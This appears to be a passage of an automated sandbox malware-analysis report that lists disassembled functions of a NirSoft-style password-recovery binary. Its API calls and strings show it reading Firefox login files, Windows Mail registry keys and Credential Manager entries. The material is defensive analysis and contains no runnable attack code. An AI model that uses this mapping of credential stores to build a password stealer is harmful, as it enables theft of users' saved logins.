memset.MSVCRT ref: 0040A718
sprintf.MSVCRT ref: 0040A74C
_mbscpy.MSVCRT ref: 0040A793
sprintf.MSVCRT ref: 0040A81A
_mbscat.MSVCRT ref: 0040A849

Part of subcall function 00410943: sprintf.MSVCRT ref: 00410962

_mbscpy.MSVCRT ref: 0040A82E
sprintf.MSVCRT ref: 0040A87D

Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
Part of subcall function 00406AD1: WriteFile.KERNEL32(00445BB0,00000001,00000000,Mxt,00000000,?,?,0040A51A,00000001,00445BB0,74784DE0), ref: 00406AEB

Strings

bgcolor="%s", xrefs: 0040A746
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040A6D7
<font color="%s">%s</font>, xrefs: 0040A812
</table><p>, xrefs: 0040A89F
<table border="1" cellpadding="5">, xrefs: 0040A754
 , xrefs: 0040A843
nowrap, xrefs: 0040A78D

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 710961058-601624466
Opcode ID: 079468a14a97a28bfa34a244c779035b9b8789af1b94a458258266399ae21ffd
Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
Opcode Fuzzy Hash: 079468a14a97a28bfa34a244c779035b9b8789af1b94a458258266399ae21ffd
Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00410B15, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410B36
memset.MSVCRT ref: 00410B4A
memset.MSVCRT ref: 00410B5E
sprintf.MSVCRT ref: 00410B88
sprintf.MSVCRT ref: 00410BB2
_mbscpy.MSVCRT ref: 00410BC3
sprintf.MSVCRT ref: 00410BDE
memset.MSVCRT ref: 00410C19
sprintf.MSVCRT ref: 00410C34
sprintf.MSVCRT ref: 00410C68

Part of subcall function 00410943: sprintf.MSVCRT ref: 00410962

Strings

<table border="1" cellpadding="5"><tr%s>, xrefs: 00410BD8
bgcolor="%s", xrefs: 00410B82
<th%s>%s%s%s, xrefs: 00410C62
</font>, xrefs: 00410BBD
<font color="%s">, xrefs: 00410BAC
width="%s", xrefs: 00410C2E

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: sprintf$memset$_mbscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 3402215030-3842416460
Opcode ID: 7653316fbcd0de4850709abcbfe938336a552be4d2d6e02152f8a9103e1a61e1
Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
Opcode Fuzzy Hash: 7653316fbcd0de4850709abcbfe938336a552be4d2d6e02152f8a9103e1a61e1
Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00441A6C, Relevance: 27.4, APIs: 7, Strings: 11, Instructions: 375COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00441AB5
memcmp.MSVCRT ref: 00441B43
memcmp.MSVCRT ref: 00441CED
memcmp.MSVCRT ref: 00441D19
memcmp.MSVCRT ref: 00441D4B
memcmp.MSVCRT ref: 00441D96
memcpy.MSVCRT ref: 00441E29

Strings

vfs, xrefs: 00441CE8
BINARY, xrefs: 00441A76
access, xrefs: 00441D69
cache, xrefs: 00441D14, 00441D36
mode, xrefs: 00441D46
no such %s mode: %s, xrefs: 00441DB1
no such vfs: %s, xrefs: 00441E54
invalid uri authority: %.*s, xrefs: 00441B54
%s mode not allowed: %s, xrefs: 00441DF6
file:, xrefs: 00441AAF
localhost, xrefs: 00441B3E

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
API String ID: 231171946-1411472696
Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C12B, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C150
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C161
strrchr.MSVCRT ref: 0040C170
_mbscat.MSVCRT ref: 0040C18A
_mbscpy.MSVCRT ref: 0040C1BE
_mbscpy.MSVCRT ref: 0040C1CF
GetWindowPlacement.USER32(?,?), ref: 0040C265

Strings

SaveFilterIndex, xrefs: 0040C201
.cfg, xrefs: 0040C184
WinPos, xrefs: 0040C279
ShowGridLines, xrefs: 0040C1E8
MarkOddEvenRows, xrefs: 0040C233
AddExportHeaderLine, xrefs: 0040C21A
lD, xrefs: 0040C1E2, 0040C1ED, 0040C1FB, 0040C206, 0040C214, 0040C21F, 0040C228, 0040C238, 0040C273, 0040C27E, 0040C297
General, xrefs: 0040C1C9

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
API String ID: 1012775001-1916105108
Opcode ID: 3ec9ae65737f60df468101d11317291680775f25fc686c1380eb29ad5bf2531f
Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
Opcode Fuzzy Hash: 3ec9ae65737f60df468101d11317291680775f25fc686c1380eb29ad5bf2531f
Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA92, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD

Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4

Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0

Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960

strlen.MSVCRT ref: 0040EAF0
strlen.MSVCRT ref: 0040EAFE
memset.MSVCRT ref: 0040EB3F
strlen.MSVCRT ref: 0040EB4E
strlen.MSVCRT ref: 0040EB5C
memset.MSVCRT ref: 0040EB9D
strlen.MSVCRT ref: 0040EBAC
strlen.MSVCRT ref: 0040EBBA
_strcmpi.MSVCRT ref: 0040EC68
_mbscpy.MSVCRT ref: 0040EC83

Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98

Strings

signons.sqlite, xrefs: 0040EB55, 0040EB70
signons.txt, xrefs: 0040EAF7, 0040EB12
none, xrefs: 0040EC62
logins.json, xrefs: 0040EBB3, 0040EBCE

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
String ID: logins.json$none$signons.sqlite$signons.txt
API String ID: 3884059725-3138536805
Opcode ID: 4f14c36e44b5096a019ef81da6c94dddbe7f031c20d1b7d5593abf6fb10a42be
Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
Opcode Fuzzy Hash: 4f14c36e44b5096a019ef81da6c94dddbe7f031c20d1b7d5593abf6fb10a42be
Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAFA, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040CB00
_strcmpi.MSVCRT ref: 0040CB15

Strings

/scomma, xrefs: 0040CB4F
/stabular, xrefs: 0040CB64
/sxml, xrefs: 0040CB25
/skeepass, xrefs: 0040CB79
/sverhtml, xrefs: 0040CB10
/shtml, xrefs: 0040CAFB
/stab, xrefs: 0040CB3A

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 1439213657-1959339147
Opcode ID: a68a991a2b5d30f9e39ec3670898e42f382199c0509315e17a46049111a42881
Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
Opcode Fuzzy Hash: a68a991a2b5d30f9e39ec3670898e42f382199c0509315e17a46049111a42881
Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E

Uniqueness

Uniqueness Score: -1.00%

Function 00443AD1, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00443AF6

Part of subcall function 00443946: strlen.MSVCRT ref: 00443953

strlen.MSVCRT ref: 00443B12
memset.MSVCRT ref: 00443B4C
memset.MSVCRT ref: 00443B60
memset.MSVCRT ref: 00443B74
memset.MSVCRT ref: 00443B9A
memcpy.MSVCRT ref: 00443BD1
memcpy.MSVCRT ref: 00443C0D
memcpy.MSVCRT ref: 00443C1F
_mbscpy.MSVCRT ref: 00443CF6
memcpy.MSVCRT ref: 00443D27
memcpy.MSVCRT ref: 00443D39

Strings

salu, xrefs: 00443B2D

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpymemset$strlen$_mbscpy
String ID: salu
API String ID: 3691931180-4177317985
Opcode ID: 3c2cae38b226ac8aa64b876739bd9ae85e9f640df3577adbcd1c3c518ee8dd6e
Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
Opcode Fuzzy Hash: 3c2cae38b226ac8aa64b876739bd9ae85e9f640df3577adbcd1c3c518ee8dd6e
Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95

Uniqueness

Uniqueness Score: -1.00%

Function 00442F98, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 136registrystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00442FBF
??2@YAPAXI@Z.MSVCRT ref: 00442FCF
memset.MSVCRT ref: 0044301B
memset.MSVCRT ref: 00443038
_mbscpy.MSVCRT ref: 00443066
RegCloseKey.ADVAPI32(?), ref: 004430AA
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004430FB
LocalFree.KERNEL32(?), ref: 00443110
??3@YAXPAX@Z.MSVCRT ref: 00443119

Strings

Software\Microsoft\Windows Live Mail, xrefs: 0044305A
Salt, xrefs: 00443094
9:, xrefs: 0044309F
Software\Microsoft\Windows Mail, xrefs: 0044304E

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset$??2@??3@ByteCharCloseFreeLocalMultiWide_mbscpystrlen
String ID: 9:$Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
API String ID: 4203108421-3174278901
Opcode ID: a47758557fa1ba39123728e4b88b14989a8336369114945292596409a68683ed
Instruction ID: f7bf93f0836b67bba3c835e38737b5ae5122e901c23063e01546d75898481f5a
Opcode Fuzzy Hash: a47758557fa1ba39123728e4b88b14989a8336369114945292596409a68683ed
Instruction Fuzzy Hash: F7417676C0411CAEDB11DFE4DC81EDEBBBCAF49314F1441ABE644E3242DA349A44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F9AC, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
FreeLibrary.KERNEL32(00000000), ref: 0040FA3C

Strings

GetModuleInformation, xrefs: 0040FA16
psapi.dll, xrefs: 0040F9BA
GetModuleBaseNameA, xrefs: 0040F9D2
EnumProcessModules, xrefs: 0040F9E3
EnumProcesses, xrefs: 0040FA05
GetModuleFileNameExA, xrefs: 0040F9F4

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2449869053-232097475
Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F177, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
memset.MSVCRT ref: 0040F1BF
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
LocalFree.KERNEL32(?), ref: 0040F2A1
RegCloseKey.ADVAPI32(?), ref: 0040F2AC
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
RegCloseKey.ADVAPI32(?), ref: 0040F2D4

Strings

ps:password, xrefs: 0040F206
Creds, xrefs: 0040F199
%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd, xrefs: 0040F18C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
API String ID: 551151806-1288872324
Opcode ID: 65086e80b6a5b02b29051501ab280fcd45d06adf4574d2fdc8f27417bda8f6f7
Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
Opcode Fuzzy Hash: 65086e80b6a5b02b29051501ab280fcd45d06adf4574d2fdc8f27417bda8f6f7
Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64

Uniqueness

Uniqueness Score: -1.00%

Function 00403E83, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
Part of subcall function 00406AD1: WriteFile.KERNEL32(00445BB0,00000001,00000000,Mxt,00000000,?,?,0040A51A,00000001,00445BB0,74784DE0), ref: 00406AEB

memset.MSVCRT ref: 00403EBB
memset.MSVCRT ref: 00403ECF
memset.MSVCRT ref: 00403EE3
sprintf.MSVCRT ref: 00403F04
_mbscpy.MSVCRT ref: 00403F20
sprintf.MSVCRT ref: 00403F57
sprintf.MSVCRT ref: 00403F88

Strings

<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
<table dir="rtl"><tr><td>, xrefs: 00403F1A
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetsprintf$FileWrite_mbscpystrlen
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 113626815-1670831295
Opcode ID: 0864bff5b9f245e7e00702d5ae0a005148ce56c4a893c65d197af4b0a75b44c0
Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
Opcode Fuzzy Hash: 0864bff5b9f245e7e00702d5ae0a005148ce56c4a893c65d197af4b0a75b44c0
Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69

Uniqueness

Uniqueness Score: -1.00%

Function 004092CB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 004092EC
LoadMenuA.USER32(?,?), ref: 004092FA

Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
Part of subcall function 00409123: memset.MSVCRT ref: 00409159
Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB

DestroyMenu.USER32(00000000), ref: 00409318
sprintf.MSVCRT ref: 0040935C
CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
memset.MSVCRT ref: 0040938D
GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
DestroyWindow.USER32(00000000), ref: 004093CD

Strings

menu_%d, xrefs: 004092E2
caption, xrefs: 004093B3
dialog_%d, xrefs: 00409352

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
String ID: caption$dialog_%d$menu_%d
API String ID: 3259144588-3822380221
Opcode ID: c57eef4f9a69d0248337f3cec95bddc8ad24d8874dd25b83ad4416fd21439078
Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
Opcode Fuzzy Hash: c57eef4f9a69d0248337f3cec95bddc8ad24d8874dd25b83ad4416fd21439078
Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F928, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994

Strings

Process32First, xrefs: 0040F97D
Module32Next, xrefs: 0040F96C
Module32First, xrefs: 0040F95B
CreateToolhelp32Snapshot, xrefs: 0040F94A
kernel32.dll, xrefs: 0040F932
Process32Next, xrefs: 0040F98E

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE

Uniqueness

Uniqueness Score: -1.00%

Function 004045D6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658

LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C

Strings

advapi32.dll, xrefs: 004045DE
CredFree, xrefs: 004045FE
CredDeleteA, xrefs: 0040460A
CredEnumerateA, xrefs: 00404616
CredEnumerateW, xrefs: 00404622
CredReadA, xrefs: 004045F6

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
API String ID: 2449869053-4258758744
Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00404217, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0040424C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
_mbscpy.MSVCRT ref: 004042B7
_mbscpy.MSVCRT ref: 004042CA
strchr.MSVCRT ref: 004042D8
strlen.MSVCRT ref: 004042EC
sprintf.MSVCRT ref: 0040430D
strchr.MSVCRT ref: 0040431E

Strings

www.google.com, xrefs: 00404246
%s@gmail.com, xrefs: 00404307

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
String ID: %s@gmail.com$www.google.com
API String ID: 3866421160-4070641962
Opcode ID: d962adbfde3f6d46bd1a4ddc996d91cd470cefa2b35a611f38f3acb321d1eaac
Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
Opcode Fuzzy Hash: d962adbfde3f6d46bd1a4ddc996d91cd470cefa2b35a611f38f3acb321d1eaac
Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59

Uniqueness

Uniqueness Score: -1.00%

Function 004094A2, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 004094BA
_mbscpy.MSVCRT ref: 004094CA

Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,00000104,0044551F,?,00001000,00451200), ref: 004090C6
Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD

EnumResourceNamesA.KERNEL32(00000104,00000004,004092CB,00000000), ref: 00409500
EnumResourceNamesA.KERNEL32(00000104,00000005,004092CB,00000000), ref: 0040950A
_mbscpy.MSVCRT ref: 00409512
memset.MSVCRT ref: 0040952E
LoadStringA.USER32(00000104,00000000,?,00001000), ref: 00409542

Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C

Strings

strings, xrefs: 0040950C
general, xrefs: 004094BF
TranslatorURL, xrefs: 004094E0
TranslatorName, xrefs: 004094D5

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
String ID: TranslatorName$TranslatorURL$general$strings
API String ID: 1035899707-3647959541
Opcode ID: c02a7e1620c193d28ef0090c9082c06cedc2e31f21f04b75fd3f2edb00844c96
Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
